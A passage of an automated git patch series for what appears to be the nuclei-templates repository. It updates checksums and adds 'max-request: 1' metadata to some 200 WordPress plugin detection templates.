+http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 -http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245 +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7194,7 +7195,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:6974e374bee15047e629369d2bfa5073d4a50bbc +templates-checksum.txt:61d84a877ff8fcbfad8135b36533649bd26beddd wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From a5af4a1f440edd12932af76cff911cc82debb824 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Sep 2023 04:48:39 +0000 Subject: [PATCH 20/23] TemplateMan Update [Wed Sep 27 04:48:39 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index f68ad2a6bf..ac77f4e5f5 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 